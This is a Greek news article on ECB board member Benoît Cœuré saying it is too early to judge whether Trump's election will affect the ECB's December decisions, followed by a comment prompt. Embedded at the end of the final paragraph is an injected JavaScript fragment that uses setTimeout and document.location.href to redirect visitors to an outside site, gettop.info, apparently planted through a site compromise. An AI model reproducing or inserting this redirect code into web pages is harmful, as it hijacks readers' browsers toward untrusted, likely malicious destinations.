Κερέ (ΕΚΤ): Νωρίς να ειπωθεί ότι η νίκη Τραμπ θα επηρεάσει τις αποφάσεις του Δεκεμβρίου

0
5

 

Απέφυγε τις υπερβολές το μέλος του Εκτελεστικού Συμβουλίου της ΕΚΤ Μπενουά Κερέ στις δηώσεις του σχετικά με τη νομισματική πολιτική και κατά πόσο αυτή θα επηρεαστεί από τη νίκη του Ντόναλντ Τραμπ στις ΗΠΑ.

Όπως είπε ο Κερέ σε συνέντευξή του στον γαλλικό όμιλο εφημερίδων EBRA: «Βραχυπρόθεσμα, παρακολουθούμε στενά την αντίδραση των χρηματοπιστωτικών αγορών. Πρέπει να αποφευχθούν υπερβολικές διακυμάνσεις. Κοιτάζοντας στο μέλλον, θα αξιολογήσουμε τις συνέπειες από την εκλογή του κ. Τραμπ για την παγκόσμια οικονομία και την Ευρωζώνη. Η ανάκαμψη στην Ευρωζώνη ενισχύεται. Αυτό ήταν ορατό μετά το βρετανικό δημοψήφισμα».

«Είναι ασφαλώς μείζον γεγονός» είπε όταν ρωτήθηκε για την αντίδραση της ΕΚΤ στην εκλογή Τραμπ, προσθέτοντας: «Δεν είναι θέμα της ΕΚΤ να αξιολογήσει τις πολιτικές συνέπειες. Υπάρχει, όμως, ένα δίδαγμα για την Ευρώπη: Σε έναν κόσμο, όπου τα σοκ αυξάνονται, η Ευρώπη πρέπει να κρατήσει τον έλεγχο της μοίρας της. Για να είναι ισχυρή η Ευρώπη σε όρους άμυνας και ασφάλειας, θα πρέπει να έχει ισχυρή οικονομία. Και για να είναι ισχυρή η οικονομία, χρειάζονται μεταρρυθμίσεις σε όλες τις χώρες και η Ευρωζώνη πρέπει να λειτουργεί καλύτερα».

«Εάν η ευρωπαϊκή οικονομία επανακτήσει τη δυνατότητα να δημιουργεί αυτοδύναμα ανάπτυξη, τα επιτόκια θα επιστρέψουν σε επίπεδα πιο ευνοϊκά για τις αποταμιεύσεις», τόνισε, επαναλαμβάνοντας ότι η νομισματική πολιτική της ΕΚΤ θα παραμείνει πολύ χαλαρή έως ότου ο πληθωρισμός κινηθεί σταθερά προς το 2% (τον στόχο της ΕΚΤ). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here